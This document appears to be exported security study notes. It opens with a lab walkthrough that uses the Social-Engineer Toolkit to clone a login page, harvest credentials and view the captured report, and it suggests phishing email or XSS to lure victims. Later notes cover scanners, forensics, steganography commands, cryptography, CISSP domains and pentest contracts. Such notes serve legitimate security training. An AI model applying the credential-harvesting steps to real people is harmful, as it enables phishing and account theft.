What is the URL after you entered the information and clicked the Login button? Is it the same as the URL you recorded in Part 2, Step 2a?

Answer Area

The URL DVWA.vm/login.php is displayed in the browser. Yes, it is the same URL as in the previous step.

Hide Answer

What happened?

Answer Area

After the login attempt, the cloned web page redirected the browser to the real web site. However, the user has real credentials have been provided to the hacker’s clone of the original website.

Hide Answer

Step 3: View the Captured Information.

Return to the terminal session that is running the SET application. Output from the login attempt should appear, similar to what is shown:

[*] WE GOT A HIT! Printing the output:

POSSIBLE USERNAME FIELD FOUND: username=some.user@gmail.com

POSSIBLE PASSWORD FIELD FOUND: password=Pa55w0rdd!

POSSIBLE USERNAME FIELD FOUND: Login=Login

POSSIBLE USERNAME FIELD FOUND: user_token=69c0375a6ee98b96a5b643eed1e97f94

[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

To save the report in XML format to use in other penetration testing applications, enter CTRL-C. The report file name and path are returned. Select the path and filename and right-click to copy the selection. The filenames that are created contain the date and time the file was created in this format:

2023-04-07 17:32:55.967169.xml

Continue to enter 99 and press enter until you have exited setoolkit. To view the content of the XML file, you need to place the filename in double-quotes (“) because it contains spaces and special characters. Use the cat command to see the information that is saved. The file path shown is the default path for the lab VM when this lab was created.

┌──(root㉿Kali)-[~]

└─# cat /root/.set/reports/”2023-04-07 17:32:55.967169.xml”

URL=http://DVWA.vm

username=some.user@gmail.com

  <param>password=Pa55w0rdd!</param>

  <param>Login=Login</param>

  <param>user_token=69c0375a6ee98b96a5b643eed1e97f94</param>

What information did the cloned web page gather?

Answer Area

The username and password of the user who attempted to login to the cloned webpage.

Hide Answer

What could a penetration tester do with this information?

Answer Area

Go to the real website and login in as a legitimate user.

Perform a social engineering attack and instantiate a fake website to perform a credential harvesting attack.

expand_less

Step 1 - 2

Step 1. Launch SET by entering the setoolkit command.

Step 2. Select 1) Social-Engineering Attacks from the main menu, as shown in Example 7-1.

Example 7-1 - Starting the Social Engineering Attack

Select from the menu:   1) Social-Engineering Attacks   2) Penetration Testing (Fast-Track)   3) Third Party Modules   4) Update the Social-Engineer Toolkit   5) Update SET configuration   6) Help, Credits, and About  99) Exit the Social-Engineer Toolkitset> 1

expand_less

Step 3

Step 3. In the menu that appears (see Example 7-2), select 2) Website Attack Vectors.

Example 7-2 - Selecting Website Attack Vectors

Select from the menu:    1) Spear-Phishing Attack Vectors    2) Website Attack Vectors    3) Infectious Media Generator    4) Create a Payload and Listener    5) Mass Mailer Attack    6) Arduino-Based Attack Vector    7) Wireless Access Point Attack Vector    8) QRCode Generator Attack Vector    9) Powershell Attack Vectors   10) Third Party Modules   99) Return back to the main menu.set>2

expand_less

Step 4

Step 4. In the menu and explanation that appear next (see Example 7-3), select 3) Credential Harvester Attack Method.

Example 7-3 - Selecting the Credential Harvester Attack Method

The Web Attack module is a unique way of utilizing multiple web-basedattacks in order to compromise the intended victim.The Java Applet Attack method will spoof a Java Certificate anddeliver a metasploit based payload. Uses a customized java appletcreated by Thomas Werth to deliver the payload.The Metasploit Browser Exploit method will utilize select Metasploitbrowser exploits through an iframe and deliver a Metasploit payload.The Credential Harvester method will utilize web cloning of awebsite that has a username and password field and harvest allthe information posted to the website.The TabNabbing method will wait for a user to move to a differenttab, then refresh the page to something different.The Web-Jacking Attack method was introduced by white_sheep, emgent.This method utilizes iframe replacements to make the highlighted URLlink to appear legitimate however when clicked a window pops up thenis replaced with the malicious link. You can edit the link replacementsettings in the set_config if it's too slow/fast.The Multi-Attack method will add a combination of attacks throughthe web attack menu. For example, you can utilize the Java Applet,Metasploit Browser, Credential Harvester/Tabnabbing all at once to seewhich is successful.The HTA Attack method will allow you to clone a site and performpowershell injection through HTA files which can be used forWindows-based powershell exploitation through the browser.   1) Java Applet Attack Method   2) Metasploit Browser Exploit Method   3) Credential Harvester Attack Method   4) Tabnabbing Attack Method   5) Web Jacking Attack Method   6) Multi-Attack Web Method   7) HTA Attack Method  99) Return to Main Menuset:webattack>3

expand_less

Step 5

Step 5. In the menu that appears next (see Example 7-4), select 1) Web Templates to use a predefined web template (Twitter). As you can see, you also have options to clone an existing website or import a custom website. In this example, you use a predefined web template.

Example 7-4 - Selecting a Predefined Web Template

The first method will allow SET to import a list of pre-defined webapplications that it can utilize within the attack.The second method will completely clone a website of your choosingand allow you to utilize the attack vectors within the completelysame web application you were attempting to clone.The third method allows you to import your own website, note that youshould only have an index.html when using the import websitefunctionality.   1) Web Templates   2) Site Cloner   3) Custom Import  99) Return to Webattack Menuset:webattack>1

expand_less

Step 6

Step 6. In the menu shown in Example 7-5, enter the IP address of the host that you would like to use to harvest the user credentials (in this case, 192.168.88.225). In this example, SET has recognized the attacking system’s IP address. If this occurs for you, you can just press Enter to select the attacking system’s IP address.

Example 7-5 - Entering the Credential Harvester’s IP Address

[-] Credential harvester will allow you to utilize the clonecapabilities within SET[-] to harvest credentials or parameters from a website as well asplace them into a report------------------------------------------------------------------------- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS *IMPORTANT * --The way that this works is by cloning a site and looking for formfields to rewrite. If the POST fields are not usual methods forposting forms this could fail. If it does, you can always save theHTML, rewrite the forms to be standard forms and use the "IMPORT"feature. Additionally, really important:If you are using an EXTERNAL IP ADDRESS, you need to place theEXTERNAL IP address below, not your NAT address. Additionally, ifyou don't know basic networking concepts, and you have a privateIP address, you will need to do port forwarding to your NAT IPaddress from your external IP address. A browser doesn't know howto communicate with a private IP address, so if you don't specifyan external IP address if you are using this from an externalperspective, it will not work. This isn't a SET issue this is hownetworking works.set:webattack> IP address for the POST back in Harvester/Tabnabbing[192.168.88.225]:

expand_less

Step 7

Step 7. Select 3. Twitter, as shown in Example 7-6.

Example 7-6 - Selecting the Template for Twitter

--------------------------------------------------------                 **** Important Information ****For templates, when a POST is initiated to harvestcredentials, you will need a site for it to redirect.You can configure this option under:      /etc/setoolkit/set.configEdit this file, and change HARVESTER_REDIRECT andHARVESTER_URL to the sites you want to redirect toafter it is posted. If you do not set these, thenit will not redirect properly. This only goes fortemplates.--------------------------------------------------------  1. Java Required  2. Google  3. Twitterset:webattack> Select a template:3[*] Cloning the website: http://www.twitter.com[*] This could take a little bit...The best way to use this attack is if username and password formfields are available. Regardless, this captures all POSTs on awebsite.[*] The Social-Engineer Toolkit Credential Harvester Attack[*] Credential Harvester is running on port 80[*] Information will be displayed to you as it arrives below:

You can then redirect users to this fake Twitter site by sending a spear phishing email or taking advantage of web vulnerabilities such as cross-site scripting (XSS) and cross-site request forgery

[Vault: Defence and Response] Forensics

Thu, 09 Oct 2025 15:41:33 GMT

File The file command is used to identify the type file based on its content rather than file extension.
Strings This command is used to extract human-readable text from binary files. sudo apt install binutils
Exiftool This command is used to extract, view, and modify metadata of various types of files. sudo apt install libimage-exiftool-perl
Hexedit This command is used to view and modify the raw hexadecimal data of a file. This is command is useful when working with corrupted file or investigating file structure.
- https://hexed.it
Binwalk Scan hidden files and embedded data
Steghide Extract data within images or audios

[Vault: Offensive Security] Automated Vulnerability Scanners

Thu, 09 Oct 2025 13:57:22 GMT

Automated vulnerability scanners are software tools that systematically identify and assess security weaknesses in computer systems, networks, and applications. These tools automate the process of scanning for known vulnerabilities, misconfigurations, and other security flaws, helping organizations proactively address potential threats before they can be exploited.

Step 1. In the discovery phase, the scanner uses a tool such as Nmap to perform host and port enumeration. Using the results of the host and port enumeration, the scanner begins to probe open ports for more information.
Step 2. When the scanner has enough information about the open port to determine what software and version are running on that port, it records that information in a database for further analysis. The scanner can use various methods to make this determination, including using banner information.
Step 3. The scanner tries to determine if the software that is listening on the target system is susceptible to any known vulnerabilities. It does this by correlating a database of known vulnerabilities against the information recorded in the database about the target services.
Step 4. The scanner produces a report on what it suspects could be vulnerable. Keep in mind that these results are often false positives and need to be validated. At the very least, this type of tool gives you an idea of where to look for vulnerabilities that might be exploitable.

Types of Vulnerability Scans

The type of vulnerability scan to use is usually driven by scan policy that is created in the automated vulnerability scanning tool. Each tool has many options available for scanning. You can often just choose to do a full scan that will operate all scanning options, although you might not be able to use every option (for instance, if you are scanning a production environment or a device that is prone to crashing when scanning occurs). In such situations, you must be careful to select only the scan options that are less likely to cause issues. Let's take a closer look at the following typical scan types:

Unauthenticated Scans
Authenticated Scans
Discovery Scans
Full Scans
Stealth Scans
Compliance Scans

Unauthenticated Scans

By default, vulnerability scanners do not use credentials to scan a target. If you provide only the IP address of the target and click Scan, the tool will begin enumerating the host from the perspective of an unauthenticated remote attacker. An unauthenticated scan shows only the network services that are exposed to the network. The scanner attempts to enumerate the ports open on the target host. If the service is not listening on the network segment that the scanner is connected to, or if it is firewalled, the scanner will report the port as closed and move on. However, this does not mean that there is not a vulnerability. Sometimes it is possible to access ports that are not exposed to the network via SSH port forwarding and other tricks. It is still important to run a credentialed (or authenticated) scan when possible.

NOTE Authenticated scans may provide a lower rate of false positives than unauthenticated scans.

Authenticated Scans

In some cases, it is best to run an authenticated scan against a target to get a full picture of the attack surface. An authenticated scan requires you to provide the scanner with a set of credentials that have root-level access to the system. The scanner actually logs in to the target via SSH or some other mechanism. It then runs commands like netstat to gather information from inside the host. Many of the commands that the scanner runs require root-level access to be able to gather the correct information from the system.

Discovery Scans

A discovery scan is primarily meant to identify the attack surface of a target. A port scan is a major part of what a discovery scan performs. A scanner may actually use a tool like Nmap to perform the port scan process. It then pulls the results of the port scan into its database to use that information for further discovery. For instance, the result of the port scan might come back showing that ports 80, 22, and 443 are open and listening. From there, the scanning tool probes those ports to identify exactly what service is running on each port. For example, say that it identifies that an Apache Tomcat 8.5.22 web server is running on ports 80 and 443. Knowing that a web server is running on the ports, the scanner can then perform further discovery tasks that are specific to web servers and applications. Now say that, at the same time, the scanner identifies that OpenSSH is listening on port 22. From there, the scanner can probe the SSH service to identify information about its configuration and capabilities, such as preferred and supported cryptographic algorithms. This type of information is useful for identifying vulnerabilities in later phases of testing.

Full Scans

As mentioned previously, a full scan typically involves enabling every scanning option in the scan policy. The options vary based on the scanner, but most vulnerability scanners have their categories of options defined similarly. For instance, they are typically organized by operating system, device manufacturer, device type, protocol, compliance, and type of attack, and the rest of the options might fall into a miscellaneous category. Example 3-44 shows a sample list of the plugin categories from the Nessus vulnerability scanner. As you can see from this list, there are a lot of plugins available for the scanner to run. It should also be obvious, based on the names of the plugin categories, that there will never be a single device that all of these plugins apply to. For instance, plugins for a macOS device would not be applicable to a Windows device. That is why you normally need to customize your plugin selection to reflect the environment that you are scanning. Doing so will reduce unnecessary traffic and speed up your scanning process.

Stealth Scans

There are sometimes situations in which you must scan an environment that is in a production state. In such situations, there is typically a requirement for running a scan without alerting the defensive position of the environment; such a scan is called a stealth scan. In this case, you will want to implement a vulnerability scanner in a manner that makes the target less likely to detect the activity. Vulnerability scanners are pretty noisy; however, there are some options you can configure to make a scan quieter. For example, as discussed earlier in this module, there are different types of Nmap scans, and they can be detected by network intrusion prevention systems (IPSs) or host firewalls. You have learned that a SYN scan is a fairly stealthy type of scan to run. This same concept applies to vulnerability scanners because they all use some kind of port scanner to enumerate the target. These same options are available in the vulnerability scanner’s configuration. You can also disable any plugins/attacks that might be especially likely to generate noisy traffic, such as any that perform denial-of-service attacks, which would definitely arouse some concerns on the target network.

Passive Vulnerability Scanner

Aside from the modifications to a traditional vulnerability scanner just described, there is also the concept of a passive vulnerability scanner. A passive vulnerability scanner monitors and analyzes the network traffic. Based on the traffic it sees, it can determine what the topology of the network consists of and what service the hosts on the network are listening on. From the detailed information about the traffic at the packet layer, a passive vulnerability scanner can determine if any of those services or even clients have vulnerabilities. For instance, if a Windows client with an outdated version of Internet Explorer is connecting to an Apache web server that is also outdated, the scanner will identify the versions of the client and server from the monitored traffic. It can then compare those versions to its database of known vulnerabilities and report the findings based on only the passive monitoring it performed.

Compliance Scans

Compliance scans are network and application tests (scans) typically driven by the market or governance that the environment serves and regulatory compliance. An example of this would be the information security environment for a healthcare entity, which must adhere to the requirements sent forth by the Health Insurance Portability and Accountability Act (HIPAA). This is where a vulnerability scanner comes into play. It is possible to use a vulnerability scanner to address the specific requirements that a policy requires. Vulnerability scanners often have the capability to import a compliance policy file. This policy file can typically map to specific plugins/attacks that the scanner is able to perform. Once the policy is imported, the specific set of compliance checks can be run against a target system. The challenge with compliance requirements is that there are many different types for different industries and government agencies, and they can all be interpreted in various ways. Some of the checks might be straightforward. If a requirement check is looking for a specific command to be run and that the output be a 1 instead of a 0, that is very simple for a vulnerability scanner to determine; however, many requirements leave more to be interpreted. This makes it very difficult for a tool like a vulnerability scanner to make a determination. Most vulnerability scanners also have the capability to create custom compliance policies. This is a valuable option for penetration testers, who typically want to fine-tune the scanner policy for each engagement.

Example

- [[Nmap#Nmap Vulners script to scan for vulnerabilities.|nmap vulners script scan]]

- [[Nessus]]

- [[Greenbone Vulnerability Management (GVM)|Greenbone Vulnerability Management (GVM)]]

Ref:

[[CVE, CWE, CVSS]]

[Vault: Tools] Caido

Thu, 09 Oct 2025 13:57:22 GMT

Caido is a modern web security auditing toolkit that emphasizes a fast, lightweight, and intuitive user experience. It provides a full suite of features for bug bounty hunters and penetration testers to inspect, manipulate, and replay web traffic. Website: caido.io

https://www.bugcrowd.com/blog/the-ultimate-beginners-guide-to-caido/

[Vault: Web Security] Content Type

Thu, 09 Oct 2025 13:57:22 GMT

The Content-Type HTTP header is used to indicate the media type (MIME type) of the resource being sent from the server to the client (browser). It tells the browser how to interpret and render the content of the response.

1. Content Interpretation: The Content-Type header informs the browser about the type of data being sent. This helps the browser decide how to handle the content. For example:

- text/html: The content is HTML and should be rendered as a web page. - application/json: The content is JSON, which should be parsed as a JavaScript object. - application/javascript: The content is JavaScript code that should be executed.

2. Handling User Inputs: For forms that upload files, the Content-Type is used to specify the type of file being uploaded to ensure proper processing on the server.

3. Security and Validation: Many web applications use the Content-Type header to validate incoming requests to protect against attacks such as XML External Entity (XXE) attacks or Cross-Site Scripting (XSS).

Example

When a browser makes a request to a server for a web page, the server responds with the following:

HTTP/1.1 200 OK

Content-Type: text/html

In this example, the Content-Type: text/html header indicates that the content being returned is an HTML document, so the browser will render it accordingly.

X-Content-Type-Options

The X-Content-Type-Options HTTP header is a security feature used by web servers to instruct browsers on how to handle content types. It is present in the response sent from the server to the client (browser).

When the header is set to nosniff, it tells the browser to not perform MIME type sniffing and to strictly adhere to the Content-Type specified by the server. This prevents the browser from interpreting content based on its actual contents rather than the declared type.

Example of MIME Type Sniffing

Scenario: Improper MIME Type Configuration

1. Server Configuration: The server is misconfigured to serve a JavaScript file with the wrong MIME type.

- Header Sent by the Server:

Content-Type: text/plain

2. Actual Content of the File:

 <script>alert('XSS');</script>

3. Browser Behavior:

- The browser receives the response and sees the Content-Type as text/plain.

- Due to MIME type sniffing, the browser inspects the content and recognizes the <script> tag.

- It may then execute the script, treating the content as HTML or JavaScript. ---

Content types

[Vault: Root] Cryptography

Thu, 09 Oct 2025 10:02:49 GMT

Encoding vs Encryption vs Hashing vs Obfuscation

Encoding

Encoding transforms data into another format using a scheme that is publicly available so that it can easily be reversed. It does not require a key as the only thing required to decode it is the algorithm that was used to encode it. Examples: ASCII, unicode, URL Encoding, Base64

Encryption

The purpose of encryption is to transform data in order to keep it secret from others, e.g. sending someone a secret letter that only they should be able to read, or securely sending a password over the Internet. Rather than focusing on usability, the goal is to ensure the data cannot be consumed by anyone other than the intended recipient(s).

Encryption transforms data into another format in such a way that only specific individual(s) can reverse the transformation. It uses a key, which is kept secret, in conjunction with the plaintext and the algorithm, in order to perform the encryption operation. As such, the ciphertext, algorithm, and key are all required to return to the plaintext.

Examples: AES, Blowfish, RSA

Types of encryption

There are two main types of encryption:

Symmetric encryption is the use of a single secret key to exchange information. Because it uses one key for encryption and decryption, the sender and receiver must know the secret key to lock or unlock the cipher.
Asymmetric encryption is the use of a public and private key pair for encryption and decryption of data. It uses two separate keys: a public key and a private key. The public key is used to encrypt data, and the private key decrypts it. The private key is only given to users with authorized access.

Hashing

[[Hashing]] serves the purpose of ensuring integrity, i.e. making it so that if something is changed you can know that it’s changed. Technically, hashing takes arbitrary input and produce a fixed-length string that has the following attributes:

The same input will always produce the same output.
Multiple disparate inputs should not produce the same output.
It should not be possible to go from the output to the input.
Any modification of a given input should result in drastic change to the hash.

Examples: SHA-3, MD5, etc.

Obfuscation

The purpose of obfuscation is to make something harder to understand, usually for the purposes of making it more difficult to attack or to copy.

One common use is the the obfuscation of source code so that it’s harder to replicate a given product if it is reverse engineered.

It’s important to note that obfuscation is not a strong control (like properly employed encryption) but rather an obstacle. It, like encoding, can often be reversed by using the same technique that obfuscated it. Other times it is simply a manual process that takes time to work through.

Another key thing to realize about obfuscation is that there is a limitation to how obscure the code can become, depending on the content being obscured. If you are obscuring computer code, for example, the limitation is that the result must still be consumable by the computer or else the application will cease to function.

Examples: JavaScript Obfuscator, ProGuard

Public Key Infrastructure (PKI)

Public key infrastructure, or PKI, is an encryption framework that secures the exchange of information online. It's a broad system that makes accessing information fast, easy, and secure. PKI is a two-step process:

The exchange of encrypted information It all starts with the exchange of encrypted information. This involves either asymmetric encryption, symmetric encryption, or both.
The establishment of trust using digital certificates between computers and networks. A digital certificate is a file that verifies the identity of a public key holder like a website, individual, organization, device, or server.

How digital certificates are created

Let's say an online business is about to launch their website, and they want to obtain a digital certificate. When they register their domain, the hosting company sends certain information over to a trusted certificate authority, or CA. The information provided is usually basic things like the company name and the country where its headquarters are located. A public key for the site is also provided. The certificate authority then uses this data to verify the company's identity. When it's confirmed, the CA encrypts the data with its own private key. Finally, they create a digital certificate that contains the encrypted company data. It also contains CA's digital signature to prove that it's authentic.

Encryption algorithms

Many web applications use a combination of symmetric and asymmetric encryption. This is how they balance user experience with safeguarding information. As an analyst, you should be aware of the most widely-used algorithms.

Symmetric algorithms

Triple DES (3DES) is known as a block cipher because of the way it converts plaintext into ciphertext in “blocks.” Its origins trace back to the Data Encryption Standard (DES), which was developed in the early 1970s. DES was one of the earliest symmetric encryption algorithms that generated 64-bit keys, although only 56 bits are used for encryption. A bit is the smallest unit of data measurement on a computer. As you might imagine, Triple DES generates keys that are three times as long. Triple DES applies the DES algorithm three times, using three different 56-bit keys. This results in an effective key length of 168 bits. Despite the longer keys, many organizations are moving away from using Triple DES due to limitations on the amount of data that can be encrypted. However, Triple DES is likely to remain in use for backwards compatibility purposes.
Advanced Encryption Standard (AES) is one of the most secure symmetric algorithms today. AES generates keys that are 128, 192, or 256 bits. Cryptographic keys of this size are considered to be safe from brute force attacks. It’s estimated that brute forcing an AES 128-bit key could take a modern computer billions of years!

Asymmetric algorithms

Rivest Shamir Adleman (RSA) is named after its three creators who developed it while at the Massachusetts Institute of Technology (MIT). RSA is one of the first asymmetric encryption algorithms that produces a public and private key pair. Asymmetric algorithms like RSA produce even longer key lengths. In part, this is due to the fact that these functions are creating two keys. RSA key sizes are 1,024, 2,048, or 4,096 bits. RSA is mainly used to protect highly sensitive data.
Digital Signature Algorithm (DSA) is a standard asymmetric algorithm that was introduced by NIST in the early 1990s. DSA also generates key lengths of 2,048 bits. This algorithm is widely used today as a complement to RSA in public key infrastructure.

Generating keys

These algorithms must be implemented when an organization chooses one to protect their data. One way this is done is using [[OpenSSL]], which is an open-source command line tool that can be used to generate public and private keys. OpenSSL is commonly used by computers to verify digital certificates that are exchanged as part of public key infrastructure.

Obscurity is not security

In the world of cryptography, a cipher must be proven to be unbreakable before claiming that it is secure. According to Kerckhoff’s principle, cryptography should be designed in such a way that all the details of an algorithm—except for the private key—should be knowable without sacrificing its security. For example, you can access all the details about how AES encryption works online and yet it is still unbreakable.

Occasionally, organizations implement their own, custom encryption algorithms. There have been instances where those secret cryptographic systems have been quickly cracked after being made public.

[!tip] A cryptographic system should not be considered secure if it requires secrecy around how it works.

[Vault: Cryptography] Steganography

Thu, 09 Oct 2025 10:02:49 GMT

steghide

Extract data within images or audios steghide embed -cf outerfile.jpg -ef innerfile.txt steghide extract -sf outerfile.txt

Using steghide to Hide Sensitive Data in an Image File steghide embed -ef secret.txt -cf websploit-logo.jpg steghide extract -sf websploit-logo.jpg -xf extracted_data.txt

stegdetect

Alternate data streams (ADS)

windows only to store a file inside a file type infile.txt > outfile:infile.txt

to access the inside file notepad outfile.txt:infile.txt

dir /r : to show alternate data streams

[Vault: GRC] CISSP Domains

Thu, 09 Oct 2025 10:02:49 GMT

The 8 CISSP security domains

Security and risk management: defines security goals and objectives, risk mitigation, compliance, business continuity, and the law.
Asset security: Secures digital and physical assets. It's also related to the storage, maintenance, retention, and destruction of data.
Security architecture and engineering: Optimizes data security by ensuring effective tools, systems, and processes are in place.
Communication and network security: Manage and secure physical networks and wireless communications.
Identity and access management: Keeps data secure, by ensuring users follow established policies to control and manage physical assets, like office spaces, and logical assets, such as networks and applications. ^3f4c32
Security assessment and testing: conducting security control testing, collecting and analyzing data, and conducting security audits to monitor for risks, threats, and vulnerabilities.
Security operations: conducting investigations and implementing preventative measures.
Software development security: Uses secure coding practices, which are a set of recommended guidelines that are used to create secure applications and services. ![[attachments/Pasted-image-20240629221942.png|CISSP Domains|944x694]]

Domain one: Security and risk management

All organizations must develop their security posture. Security posture is an organization’s ability to manage its defense of critical assets and data and react to change. Elements of the security and risk management domain that impact an organization's security posture include:

Security goals and objectives
Risk mitigation processes
Compliance
Business continuity plans
Legal regulations
Professional and organizational ethics

Information security, or InfoSec, is also related to this domain and refers to a set of processes established to secure information. An organization may use playbooks and implement training as a part of their security and risk management program, based on their needs and perceived risk. There are many InfoSec design processes, such as:

Incident response
Vulnerability management
Application security
Cloud security
Infrastructure security

As an example, a security team may need to alter how personally identifiable information (PII) is treated in order to adhere to the European Union's General Data Protection Regulation (GDPR).

Domain two: Asset security

Asset security involves managing the cybersecurity processes of organizational assets, including the storage, maintenance, retention, and destruction of physical and virtual data. Because the loss or theft of assets can expose an organization and increase the level of risk, keeping track of assets and the data they hold is essential. Conducting a security impact analysis, establishing a recovery plan, and managing data exposure will depend on the level of risk associated with each asset. Security analysts may need to store, maintain, and retain data by creating backups to ensure they are able to restore the environment if a security incident places the organization’s data at risk.

Domain three: Security architecture and engineering

This domain focuses on managing data security. Ensuring effective tools, systems, and processes are in place helps protect an organization’s assets and data. Security architects and engineers create these processes.

One important aspect of this domain is the concept of shared responsibility. Shared responsibility means all individuals involved take an active role in lowering risk during the design of a security system. Additional design principles related to this domain, which are discussed later in the program, include:

Threat modeling
Least privilege
Defense in depth
Fail securely
Separation of duties
Keep it simple
Zero trust
Trust but verify

An example of managing data is the use of a security information and event management (SIEM) tool to monitor for flags related to unusual login or user activity that could indicate a threat actor is attempting to access private data.

Domain four: Communication and network security

This domain focuses on managing and securing physical networks and wireless communications. This includes on-site, remote, and cloud communications.

Organizations with remote, hybrid, and on-site work environments must ensure data remains secure, but managing external connections to make certain that remote workers are securely accessing an organization’s networks is a challenge. Designing network security controls—such as restricted network access—can help protect users and ensure an organization’s network remains secure when employees travel or work outside of the main office.

Domain five: Identity and access management

The identity and access management (IAM) domain focuses on keeping data secure. It does this by ensuring user identities are trusted and authenticated and that access to physical and logical assets is authorized. This helps prevent unauthorized users, while allowing authorized users to perform their tasks.

Essentially, IAM uses what is referred to as the principle of least privilege, which is the concept of granting only the minimal access and authorization required to complete a task. As an example, a cybersecurity analyst might be asked to ensure that customer service representatives can only view the private data of a customer, such as their phone number, while working to resolve the customer's issue; then remove access when the customer's issue is resolved. There are four main components to IAM.

Identification is when a user verifies who they are by providing a user name, an access card, or biometric data such as a fingerprint.
Authentication is the verification process to prove a person's identity, such as entering a password or PIN.
Authorization takes place after a user's identity has been confirmed and relates to their level of access, which depends on the role in the organization.
Accountability refers to monitoring and recording user actions, like login attempts, to prove systems and data are used properly.

Domain six: Security assessment and testing

The security assessment and testing domain focuses on identifying and mitigating risks, threats, and vulnerabilities. Security assessments help organizations determine whether their internal systems are secure or at risk. Organizations might employ penetration testers, often referred to as “pen testers,” to find vulnerabilities that could be exploited by a threat actor.

This domain suggests that organizations conduct security control testing, as well as collect and analyze data. Additionally, it emphasizes the importance of conducting security audits to monitor for and reduce the probability of a data breach. To contribute to these types of tasks, cybersecurity professionals may be tasked with auditing user permissions to validate that users have the correct levels of access to internal systems.

Domain seven: Security operations

The security operations domain focuses on the investigation of a potential data breach and the implementation of preventative measures after a security incident has occurred. This includes using strategies, processes, and tools such as:

Training and awareness
Reporting and documentation
Intrusion detection and prevention
SIEM tools
Log management
Incident management
Playbooks
Post-breach forensics
Reflecting on lessons learned

The cybersecurity professionals involved in this domain work as a team to manage, prevent, and investigate threats, risks, and vulnerabilities. These individuals are trained to handle active attacks, such as large amounts of data being accessed from an organization's internal network, outside of normal working hours. Once a threat is identified, the team works diligently to keep private data and information safe from threat actors.

Domain eight: Software development security

The software development security domain is focused on using secure programming practices and guidelines to create secure applications. Having secure applications helps deliver secure and reliable services, which helps protect organizations and their users. Security must be incorporated into each element of the software development life cycle, from design and development to testing and release. To achieve security, the software development process must have security in mind at each step. Security cannot be an afterthought. Performing application security tests can help ensure vulnerabilities are identified and mitigated accordingly. Having a system in place to test the programming conventions, software executables, and security measures embedded in the software is necessary. Having quality assurance and pen tester professionals ensure the software has met security and performance standards is also an essential part of the software development process. For example, an entry-level analyst working for a pharmaceutical company might be asked to make sure encryption is properly configured for a new medical device that will store private patient data.

[Vault: GRC] Legal Concepts

Thu, 09 Oct 2025 10:02:49 GMT

Service-level agreement (SLA)

An SLA is a well-documented expectation or constraint related to one or more of the minimum and/or maximum performance measures (such as quality, timeline/timeframe, and cost) of the penetration testing service. You should become familiar with any SLAs that the organization that hired you has provided to its customers.

Confidentiality

You must discuss and agree on the handling of confidential data. For example, if you are able to find passwords or other sensitive data, do you need to disclose all those passwords or all that sensitive data? Who will have access to the sensitive data? What will be the proper way to communicate and handle such data? Similarly, you must protect sensitive data and delete all records, per your agreement with your client. Your customer could have specific data retention policies that you might also have to be aware of. Every time you finish a penetration testing engagement, you should delete any records from your systems. You do not want your next customer to find sensitive information from another client in any system or communication.

Statement of work (SOW)

An SOW is a document that specifies the activities to be performed during a penetration testing engagement. It can be used to define some of the following elements:

Project (penetration testing) timelines, including the report delivery schedule
The scope of the work to be performed
The location of the work (geographic location or network location)
Special technical and nontechnical requirements
Payment schedule
Miscellaneous items that may not be part of the main negotiation but that need to be listed and tracked because they could pose problems during the overall engagement The SOW can be a standalone document or can be part of a master service agreement (MSA).

Master service agreement (MSA)

MSAs, which are very popular today, are contracts that can be used to quickly negotiate the work to be performed. When a master agreement is in place, the same terms do not have to be renegotiated every time you perform work for a customer. MSAs are especially beneficial when you perform a penetration test, and you know that you will be rehired on a recurring basis to perform additional tests in other areas of the company or to verify that the security posture of the organization has been improved as a result of prior testing and remediation.

Non-disclosure agreement (NDA)

An NDA is a legal document and contract between you and an organization that has hired you as a penetration tester. An NDA specifies and defines confidential material, knowledge, and information that should not be disclosed and that should be kept confidential by both parties. NDAs can be classified as any of the following:

Unilateral: With a unilateral NDA, only one party discloses certain information to the other party, and the information must be kept protected and not disclosed. For example, an organization that hires you should include in an NDA certain information that you should not disclose. Of course, all of your findings must be kept secret and should not be disclosed to any other organization or individual.
Bilateral: A bilateral NDA is also referred to as a mutual, or two-way, NDA. In a bilateral NDA, both parties share sensitive information with each other, and this information should not be disclosed to any other entity.
Multilateral: This type of NDA involves three or more parties, with at least one of the parties disclosing sensitive information that should not be disclosed to any entity outside the agreement. Multilateral NDAs are used in the event that an organization external to your customer (business partner, service provider, and so on) should also be engaged in the penetration testing engagement.

Contracts

The contract is one of the most important documents in a pen testing engagement. It specifies the terms of the agreement and how you will get paid, and it provides clear documentation of the services that will be performed. A contract should be very specific, easy to understand, and without ambiguities. Any ambiguities will likely lead to customer dissatisfaction and friction. Legal advice (from a lawyer) is always recommended for any contract.

Your customer might also engage its legal department or an outside agency to review the contract. A customer might specify and demand that any information collected or analyzed during the penetration testing engagement cannot be made available outside the country where you performed the test. In addition, the customer might specify that you (as the penetration tester) cannot remove personally identifiable information (PII) that might be subject to specific laws or regulations without first committing to be bound by those laws and regulations or without the written authorization of the company. Your customer will also review the penetration testing contract or agreement to make sure it does not permit more risk than it is intended to resolve.

Another very important element of your contract and pre-engagement tasks is that you must obtain a signature from a proper signing authority for your contract. This includes written authorization for the work to be performed. If necessary, you should also have written authorization from any third-party provider or business partner. This would include, for example, Internet service providers, cloud service providers, or any other external entity that could be considered to be impacted by or related to the penetration test to be performed.

Disclaimers

You might want to add disclaimers to your pre-engagement documentation, as well as in the final report. For example, you can specify that you conducted penetration testing on the applications and systems that existed as of a clearly stated date. Cybersecurity threats are always changing, and new vulnerabilities are discovered daily. No software, hardware, or technology is immune to security vulnerabilities, no matter how much security testing is conducted.

You should also specify that the penetration testing report is intended only to provide documentation and that your client will determine the best way to remediate any vulnerabilities. In addition, you should include a disclaimer that your penetration testing report cannot and does not protect against personal or business loss as a result of use of the applications or systems described therein.

Another standard disclaimer is that you (or your organizations) provide no warranties, representations, or legal certifications concerning the applications or systems that were or will be tested. A disclaimer might say that your penetration testing report does not represent or warrant that the application tested is suitable to the task and free of other vulnerabilities or functional defects aside from those reported. In addition, it is standard to include a disclaimer stating that such systems are fully compliant with any industry standards or fully compatible with any operating system, hardware, or other application.

Of course, these are general ideas and best practices. You might also hire a lawyer to help create and customize your contracts, as needed.

[Vault: GRC] Regulatory Compliance

Thu, 09 Oct 2025 10:02:49 GMT

Key Technical Elements in Regulations You Should Consider

Most regulations dictate several key elements, and a penetration tester should pay attention to and verify them during assessment to make sure the organization is compliant. Select each element for more information.

Data Isolation

Organizations that need to comply with PCI DSS (and other regulations, for that matter) should have a data isolation strategy. Also known as network isolation or network segmentation, the goal is to implement a completely isolated network that includes all systems involved in payment card processing.

Password Management

